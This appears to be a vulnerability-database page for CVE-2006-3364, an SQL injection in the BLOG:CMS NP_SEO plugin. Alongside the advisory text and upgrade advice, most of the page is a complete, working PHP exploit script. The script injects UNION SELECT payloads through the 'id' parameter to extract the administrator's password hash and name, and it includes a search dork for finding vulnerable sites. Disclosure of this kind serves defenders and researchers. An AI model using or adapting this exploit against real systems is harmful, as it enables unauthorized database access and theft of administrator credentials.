ID: CVE-2006-3364 | Type: cve | Reporter: cve@mitre.org | Modified: 2018-10-18T16:47:00
Description
SQL injection vulnerability in index.php in the NP_SEO plugin in BLOG:CMS before 4.1.0 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Upgrade to BLOG:CMS version 4.1.0:
http://sourceforge.net/project/showfiles.php?group_id=111880
Related entries

exploitdb: EDB-ID:1960
Title: BLOG:CMS <= 4.0.0k Remote SQL Injection Exploit
Description: BLOG:CMS <= 4.0.0k Remote SQL Injection Exploit. CVE-2006-3364. Webapps exploit for php platform
Published: 2006-06-28 | Modified: 2006-06-28 | Last seen: 2016-01-31T15:14:09
CVSS: 7.5 (AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/)
Href: https://www.exploit-db.com/exploits/1960/
Source: https://www.exploit-db.com/download/1960/
Source data:

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "BLOG:CMS <= 4.0.0k sql injection/admin credentials disclosure exploit\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork: \"Powered by BLOG:CMS\"|\"Powered by blogcms.com\"|\"2003-2004, Radek Hulán\"\n\n";

if ($argc<3) {
echo "Usage: php ".$argv[0]." host path OPTIONS\n";
echo "host: target server (ip/hostname)\n";
echo "path: path to BLOG:CMS\n";
echo "Options:\n";
echo " -p[port]: specify a port other than 80\n";
echo " -P[ip:port]: specify a proxy\n";
echo " -T[prefix]: specify a table prefix (default: none)\n";
echo "Example:\n";
echo "php ".$argv[0]." localhost /blog/\n";
die;
}
/* software site: http://blogcms.com/

 i) vulnerable code in index.php, lines 19-36:

 ...
// NP_SEO plugin redirect
if (isset($_GET['id'])){
 $query=sql_query("select url from ".sql_table("plug_seo")." where id='".undoMagic($_GET['id'])."'");
 if ($row=sql_fetch_object($query)) {
 $row->url=stripslashes($row->url);
 $redirect=true;
 if (strpos($row->url,'|noseo|')!==false) {
 $arr=explode(",",'msnbot,googlebot,crawler,centrum');
 foreach ($arr as $s) if (strstr($_SERVER["HTTP_USER_AGENT"],$s)) $redirect=false;
 $arr=explode(",",'downloader.seznam,inktomi,yahoo,altavista,fasttrack,excite,hotbot,alltheweb,yahoo');
 $dns = strtolower(@gethostbyaddr($_SERVER["REMOTE_ADDR"]));
 foreach ($arr as $s) if (strstr($dns,$s)) $redirect=false;
 $row->url=str_replace('|noseo|','',$row->url);
 }
 if ($redirect) header('Location: '.unhtmlentities($row->url));
 }
 unset($query);
}
 ...

 "id" argument is not sanitized before to be used in a sql query...
 also you can inject sql statements regardless of magic_quotes_gpc settings,
 look at undoMagic() function in vars4.1.0.php:

 // removes magic quotes if that option is enabled
 function undoMagic($data) {
	return get_magic_quotes_gpc() ? stripslashes($data) : $data;
 }

 very nice code :)
 */


error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
 $result='';$exa='';$cont=0;
 for ($i=0; $i<=strlen($string)-1; $i++)
 {
 if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
 {$result.=" .";}
 else
 {$result.=" ".$string[$i];}
 if (strlen(dechex(ord($string[$i])))==2)
 {$exa.=" ".dechex(ord($string[$i]));}
 else
 {$exa.=" 0".dechex(ord($string[$i]));}
 $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
 }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
 global $proxy, $host, $port, $html, $proxy_regex;
 if ($proxy=='') {
 $ock=fsockopen(gethostbyname($host),$port);
 if (!$ock) {
 echo 'No response from '.$host.':'.$port; die;
 }
 }
 else {
	$c = preg_match($proxy_regex,$proxy);
 if (!$c) {
 echo 'Not a valid proxy...';die;
 }
 $parts=explode(':',$proxy);
 echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
 $ock=fsockopen($parts[0],$parts[1]);
 if (!$ock) {
 echo 'No response from proxy...';die;
	}
 }
 fputs($ock,$packet);
 if ($proxy=='') {
 $html='';
 while (!feof($ock)) {
 $html.=fgets($ock);
 }
 }
 else {
 $html='';
 while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
 $html.=fread($ock,1);
 }
 }
 fclose($ock);
 #debug
 #echo "\r\n".$html;
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
$prefix="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
 $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
 $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
 $prefix=str_replace("-T","",$argv[$i]);
}
}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$sql="9999999'/**/UNION/**/SELECT/**/mpassword/**/FROM/**/".$prefix."nucleus_member/**/WHERE/**/mnumber=1/*"; //id = 2, admin
$sql=urlencode($sql);
$packet ="GET ".$p."?id=$sql HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
$temp=explode("Location: ",$html);
$temp2=explode("\n",$temp[1]);
$temp2[0]=trim($temp2[0]);
if (($temp2[0]<>"") and (!strstr($temp2[0],"http")) and (!strstr($temp2[0],"UNION")))
{
 if (strlen($temp2[0])==40) {$type="sha1";}
 if (strlen($temp2[0])==32) {$type="md5";}
 echo "exploit succeded...\n";
 echo "password (".$type.")-> ".$temp2[0]."\n";
 $sql="9999999'/**/UNION/**/SELECT/**/mrealname/**/FROM/**/".$prefix."nucleus_member/**/WHERE mnumber=1/*";
 $sql=urlencode($sql);
 $packet ="GET ".$p."?id=$sql HTTP/1.0\r\n";
 $packet.="Host: ".$host."\r\n";
 $packet.="Connection: Close\r\n\r\n";
 sendpacketii($packet);
 $temp=explode("Location: ",$html);
 $temp2=explode("\n",$temp[1]);
 echo "admin -> ".$temp2[0]."\n";
}
else
{
//debug
echo $html."\r\n";
echo "exploit failed... see html\n";
}
?>

# milw0rm.com [2006-06-28]

osvdb: OSVDB:26877
Title: BLOG:CMS index.php id Variable SQL Injection
Published: 2006-06-28T04:42:19 | Modified: 2006-06-28T04:42:19 | Last seen: 2017-04-28T13:20:23
CVSS: 7.5 (AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/)
Href: https://vulners.com/osvdb/OSVDB:26877

Vulnerability Description
Blog:Cms contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'id' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.

Solution Description
Upgrade to version 4.1.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

References:
Security Tracker: 1016408
Secunia Advisory ID: 20859 (https://secuniaresearch.flexerasoftware.com/advisories/20859/)
Other Advisory URL: http://retrogod.altervista.org/blogcms_400k_sql.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0597.html
FrSIRT Advisory: ADV-2006-2582
CVE-2006-3364: https://vulners.com/cve/CVE-2006-3364